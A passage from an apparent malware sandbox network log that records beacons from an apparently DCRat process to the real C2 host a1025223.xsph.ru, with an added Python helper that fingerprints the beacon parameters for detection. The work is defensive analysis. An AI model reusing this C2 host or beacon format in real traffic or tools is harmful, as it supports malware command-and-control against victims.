                                  Data Ascii: 163.203 101.144 161.864 101.908C160.908 102.481 161.673 104.199 162.821 103.627C165.69 101.908 169.133 101.526 172.193 102.672C173.34 103.054 173.914 101.144 172.767 100.762Z" fill="black"/> <path d="M141.208 97.1331C138.721 99.8064 1
                                   Sep 27, 2024 08:42:44.758886099 CEST | 224 | IN | Data Raw: 39 2e 39 32 36 20 39 37 2e 35 31 35 36 43 32 30 30 2e 31 31 37 20 39 36 2e 39 34 32 38 20 31 39 39 2e 39 32 36 20 39 36 2e 35 36 30 39 20 31 39 39 2e 33 35 32 20 39 36 2e 33 36 39 39 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20
                                  Data Ascii: 9.926 97.5156C200.117 96.9428 199.926 96.5609 199.352 96.3699Z" fill="black"/> <path d="M311.434 112.411C311.816 111.647 311.242 111.074 310.669 110.883C308.756 110.692 307.035 110.501 305.122 110.31C306.652 108.974
                                   Sep 27, 2024 08:42:44.758904934 CEST | 1236 | IN | Data Raw: 33 30 38 2e 31 38 32 20 31 30 37 2e 34 34 36 20 33 30 39 2e 35 32 31 20 31 30 35 2e 37 32 38 43 33 30 39 2e 39 30 34 20 31 30 35 2e 31 35 35 20 33 30 39 2e 33 33 20 31 30 34 2e 32 20 33 30 38 2e 37 35 36 20 31 30 34 2e 32 43 33 30 35 2e 33 31 33
                                  Data Ascii: 308.182 107.446 309.521 105.728C309.904 105.155 309.33 104.2 308.756 104.2C305.313 104.2 301.87 104.964 298.619 106.3C298.619 106.3 296.898 106.873 296.324 107.255C295.941 106.873 294.794 106.11 294.411 106.11C295.176 104.391 296.324 102.291 2
                                   Sep 27, 2024 08:42:44.763771057 CEST | 1236 | IN | Data Raw: 20 31 33 32 2e 39 38 33 20 34 31 2e 39 35 30 32 43 31 33 30 2e 36 38 38 20 34 33 2e 32 38 36 39 20 31 32 38 2e 32 30 32 20 34 34 2e 36 32 33 35 20 31 32 35 2e 37 31 35 20 34 35 2e 39 36 30 32 43 31 32 33 2e 34 32 20 34 37 2e 32 39 36 39 20 31 32
                                  Data Ascii: 132.983 41.9502C130.688 43.2869 128.202 44.6235 125.715 45.9602C123.42 47.2969 121.316 48.6335 118.83 49.2064C118.83 49.2064 117.108 48.4426 116.917 48.4426C101.233 45.7692 86.8885 48.4426 71.3961 51.3068C66.997 52.0706 62.4066 53.0254 58.007
                                   Sep 27, 2024 08:42:44.990245104 CEST | 404 | OUT | GET /d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/html
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                  Host: a1025223.xsph.ru
                                   Sep 27, 2024 08:42:45.228665113 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:42:45 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                   Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Ошибка 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
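The sessions to a1025223.xsph.ru share one shape: the same script (`/d2e9d328.php`), the same two 32-hex-character parameter names carrying the same two values in every request, and a different random-looking name/value pair per session that is sent twice, once as the first and once as the last query parameter, under a different User-Agent each time. Reversing the value of the `5f975759356989d1a1cbaf57a59bcab1` parameter and base64-decoding it yields a 40-character hex string; the report does not say what that identifier is, so the decode is only an observation about these captured values. Every request was answered with a 403 carrying the hoster's "Сайт заблокирован" ("Site blocked") page, so no C2 response body is available in this capture. The helper below is an added example written for this page, not code from Joe Sandbox or from DCRat; the request targets are copied from the sessions above, and the random-pair detection and fingerprint logic are this example's own.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# Request targets copied from the three sessions above (sessions 1 to 3).
BEACONS = [
    "/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0"
    "&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9"
    "&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO"
    "&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0",
    "/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT"
    "&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9"
    "&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO"
    "&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT",
    "/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz"
    "&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9"
    "&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO"
    "&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz",
]

HEX32 = re.compile(r"^[0-9a-f]{32}$")   # MD5-length parameter names
HEXSTR = re.compile(r"^[0-9a-f]+$")


def reversed_b64(value: str):
    """Reverse the string, restore base64 padding and decode.
    Returns printable ASCII text, or None if the result is not valid base64 / not text."""
    s = value[::-1]
    s += "=" * (-len(s) % 4)
    try:
        out = base64.b64decode(s, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return out if out.isprintable() else None


def analyze_beacon(url: str) -> dict:
    """Break one request target into the stable and the per-request parts."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    names = [k for k, _ in pairs]
    repeated = sorted({k for k in names if names.count(k) > 1})
    fixed = {k: v for k, v in pairs if HEX32.match(k)}
    decoded = {}
    for k, v in fixed.items():
        text = reversed_b64(v)
        if text and HEXSTR.match(text):      # keep only hex-looking results
            decoded[k] = text
    return {
        "path": parts.path,
        "param_count": len(pairs),
        "repeated": repeated,                # the random pair, sent first and last
        "fixed_keys": sorted(fixed),         # stable names across all sessions
        "decoded": decoded,
    }


def common_fingerprint(urls):
    """(name, value) pairs present in every beacon: the part a detection rule can
    key on, unlike the random pair that changes from session to session."""
    sets = [set(parse_qsl(urlsplit(u).query)) for u in urls]
    return sorted(set.intersection(*sets))


if __name__ == "__main__":
    for u in BEACONS:
        print(analyze_beacon(u))
    print(common_fingerprint(BEACONS))
```

Keying a network signature on the script name plus the two fixed parameter names is what survives across these sessions; a rule that matched on the first parameter name would have missed two of the three, and one that matched on the User-Agent would have missed all but one.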


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   2 | 192.168.2.9 | 49716 | 141.8.194.149 | 80 | 5376 | C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Sep 27, 2024 08:42:56.465290070 CEST | 477 | OUT | GET /d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/plain
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                  Host: a1025223.xsph.ru
                                  Connection: Keep-Alive
                                   Sep 27, 2024 08:42:57.134569883 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:42:56 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                   Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Ошибка 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
                                   Sep 27, 2024 08:42:57.134592056 CEST | 1236 | IN | Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b
                                  Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
                                   Sep 27, 2024 08:42:57.134618998 CEST | 1236 | IN | Data Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61
                                  Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
                                   Sep 27, 2024 08:42:57.134629965 CEST | 672 | IN | Data Raw: 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 6c 6f 6e 67 2d 6c 6f 67 6f 7b 6d 61 78 2d 77 69 64 74 68 3a 31 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72
                                  Data Ascii: ntent .footer__long-logo{max-width:188px;max-height:32px}.wrapper .content .footer__text{color:#000;font-size:14px;line-height:138%;margin-bottom:16px;white-space:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-h
                                   Sep 27, 2024 08:42:57.134641886 CEST | 1236 | IN | Data Raw: 65 72 2d 78 73 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 69 67 68 74 2d 73 69 64 65 20 2e 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65
                                  Data Ascii: er-xs{display:block}.wrapper .content .right-side .image-container-md{display:none}.wrapper .content .footer{max-width:328px}.wrapper .content .footer--long{max-width:333px}.wrapper .content .footer__rights{max-width:230px}}@media screen and (
                                   Sep 27, 2024 08:42:57.134654045 CEST | 1236 | IN | Data Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 69 67 68 74 2d 73 69 64 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 2d 63 6f 6e 74
                                  Data Ascii: </div> <div class="right-side"> <div class="image-container image-container-md"> <a href="https://index.from.sh/pages/game.html"> <svg width="328" height="384" viewbox="0
                                   Sep 27, 2024 08:42:57.134665012 CEST | 1236 | IN | Data Raw: 37 2e 30 31 33 39 43 31 36 38 2e 37 35 20 38 37 2e 35 38 36 37 20 31 36 38 2e 35 35 39 20 38 38 2e 37 33 32 34 20 31 36 37 2e 37 39 34 20 38 39 2e 34 39 36 32 43 31 36 37 2e 34 31 31 20 39 30 2e 30 36 39 31 20 31 36 36 2e 36 34 36 20 38 39 2e 38
                                  Data Ascii: 7.0139C168.75 87.5867 168.559 88.7324 167.794 89.4962C167.411 90.0691 166.646 89.8781 166.072 89.6872C165.116 88.7324 163.968 87.7777 163.012 86.632C162.247 85.8682 161.099 85.1044 160.143 85.2953C159.761 85.2953 159.378 85.2953 158.995 85.486
                                   Sep 27, 2024 08:42:57.134675980 CEST | 1236 | IN | Data Raw: 31 38 35 2e 30 30 38 20 38 39 2e 34 39 35 34 20 31 38 36 2e 31 35 35 20 38 39 2e 34 39 35 34 43 31 38 39 2e 37 38 39 20 38 39 2e 33 30 34 35 20 31 39 33 2e 34 32 33 20 38 39 2e 34 39 35 34 20 31 39 36 2e 38 36 36 20 38 39 2e 38 37 37 33 43 31 39
                                  Data Ascii: 185.008 89.4954 186.155 89.4954C189.789 89.3045 193.423 89.4954 196.866 89.8773C197.44 89.8773 197.822 89.4954 197.822 88.9226C197.822 88.3497 197.44 87.9678 196.866 87.9678Z" fill="black"/> <path d="M199.352 96.3699C195.718 94.8423 19
                                   Sep 27, 2024 08:42:57.134686947 CEST | 1236 | IN | Data Raw: 20 31 30 31 2e 31 34 35 20 32 32 30 2e 33 39 32 20 39 34 2e 34 36 31 36 43 32 32 31 2e 37 33 20 38 36 2e 30 35 39 38 20 32 32 32 2e 36 38 37 20 37 37 2e 34 36 37 20 32 32 33 2e 30 36 39 20 36 39 2e 30 36 35 32 43 32 32 33 2e 30 36 39 20 36 38 2e
                                  Data Ascii: 101.145 220.392 94.4616C221.73 86.0598 222.687 77.467 223.069 69.0652C223.069 68.8742 223.069 68.8742 223.069 68.8742C227.086 54.553 235.502 41.5683 237.797 26.6742C238.562 26.2923 238.753 25.1466 237.797 24.9557C226.703 22.6643 215.419 25.52
                                   Sep 27, 2024 08:42:57.134697914 CEST | 1236 | IN | Data Raw: 37 38 20 38 34 2e 37 38 34 36 20 31 33 36 2e 32 38 43 38 34 2e 32 31 30 38 20 31 33 36 2e 36 36 32 20 38 33 2e 32 35 34 35 20 31 33 37 2e 30 34 33 20 38 33 2e 34 34 35 38 20 31 33 37 2e 38 30 37 56 31 33 37 2e 39 39 38 43 38 33 2e 34 34 35 38 20
                                  Data Ascii: 78 84.7846 136.28C84.2108 136.662 83.2545 137.043 83.4458 137.807V137.998C83.4458 138.38 83.2545 138.762 83.2545 139.144C82.872 140.481 82.872 141.817 83.2545 142.963C83.2545 142.963 83.2545 142.963 83.2545 143.154C83.2545 143.345 83.4458 143.
                                   Sep 27, 2024 08:42:57.140736103 CEST | 1236 | IN | Data Raw: 31 33 35 2e 35 31 36 20 39 2e 39 39 39 39 37 20 31 33 35 2e 38 39 38 43 31 33 2e 34 34 32 37 20 31 33 38 2e 33 38 20 31 37 2e 34 35 39 33 20 31 34 30 2e 30 39 39 20 32 31 2e 34 37 35 39 20 31 34 31 2e 34 33 35 43 32 31 2e 34 37 35 39 20 31 34 31
                                  Data Ascii: 135.516 9.99997 135.898C13.4427 138.38 17.4593 140.099 21.4759 141.435C21.4759 141.626 31.2304 151.938 35.247 156.52C42.7063 164.922 50.7394 172.942 59.7289 180.007C63.7455 183.253 67.9533 186.882 73.1174 185.927C76.7515 185.354 86.6973 178.67
                                   Sep 27, 2024 08:42:57.454768896 CEST | 453 | OUT | GET /d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/plain
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                  Host: a1025223.xsph.ru
                                   Sep 27, 2024 08:42:57.665817022 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:42:57 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49718 | 141.8.194.149 | 80 | 3420 | C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 08:43:20.931432962 CEST | 488 | OUT | GET /d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz HTTP/1.1
    Accept: */*
    Content-Type: text/plain
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: a1025223.xsph.ru
    Connection: Keep-Alive
Sep 27, 2024 08:43:21.620825052 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Fri, 27 Sep 2024 06:43:21 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
Sep 27, 2024 08:43:21.854018927 CEST | 464 | OUT | GET /d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz HTTP/1.1
    Accept: */*
    Content-Type: text/plain
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: a1025223.xsph.ru
Sep 27, 2024 08:43:22.065361023 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Fri, 27 Sep 2024 06:43:21 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49719 | 141.8.194.149 | 80 | 4460 | C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 08:43:35.265680075 CEST | 600 | OUT | GET /d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: a1025223.xsph.ru
    Connection: Keep-Alive
Sep 27, 2024 08:43:36.033165932 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Fri, 27 Sep 2024 06:43:35 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
Sep 27, 2024 08:43:36.033241034 CEST | 1236 | IN | Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p> <h1 c
Sep 27, 2024 08:43:36.182079077 CEST | 576 | OUT | GET /d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: a1025223.xsph.ru
Sep 27, 2024 08:43:36.391685009 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Fri, 27 Sep 2024 06:43:36 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49720 | 141.8.194.149 | 80 | 3592 | C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 08:43:53.153426886 CEST | 596 | OUT | GET /d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme HTTP/1.1
    Accept: */*
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: a1025223.xsph.ru
    Connection: Keep-Alive
Sep 27, 2024 08:43:53.823070049 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Fri, 27 Sep 2024 06:43:53 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
                                  Data Ascii: </div> <div class="right-side"> <div class="image-container image-container-md"> <a href="https://index.from.sh/pages/game.html"> <svg width="328" height="384" viewbox="0
                                  Sep 27, 2024 08:43:53.823200941 CEST1236INData Raw: 37 2e 30 31 33 39 43 31 36 38 2e 37 35 20 38 37 2e 35 38 36 37 20 31 36 38 2e 35 35 39 20 38 38 2e 37 33 32 34 20 31 36 37 2e 37 39 34 20 38 39 2e 34 39 36 32 43 31 36 37 2e 34 31 31 20 39 30 2e 30 36 39 31 20 31 36 36 2e 36 34 36 20 38 39 2e 38
                                  Data Ascii: 7.0139C168.75 87.5867 168.559 88.7324 167.794 89.4962C167.411 90.0691 166.646 89.8781 166.072 89.6872C165.116 88.7324 163.968 87.7777 163.012 86.632C162.247 85.8682 161.099 85.1044 160.143 85.2953C159.761 85.2953 159.378 85.2953 158.995 85.486
                                  Sep 27, 2024 08:43:53.823216915 CEST672INData Raw: 31 38 35 2e 30 30 38 20 38 39 2e 34 39 35 34 20 31 38 36 2e 31 35 35 20 38 39 2e 34 39 35 34 43 31 38 39 2e 37 38 39 20 38 39 2e 33 30 34 35 20 31 39 33 2e 34 32 33 20 38 39 2e 34 39 35 34 20 31 39 36 2e 38 36 36 20 38 39 2e 38 37 37 33 43 31 39
                                  Data Ascii: 185.008 89.4954 186.155 89.4954C189.789 89.3045 193.423 89.4954 196.866 89.8773C197.44 89.8773 197.822 89.4954 197.822 88.9226C197.822 88.3497 197.44 87.9678 196.866 87.9678Z" fill="black"/> <path d="M199.352 96.3699C195.718 94.8423 19
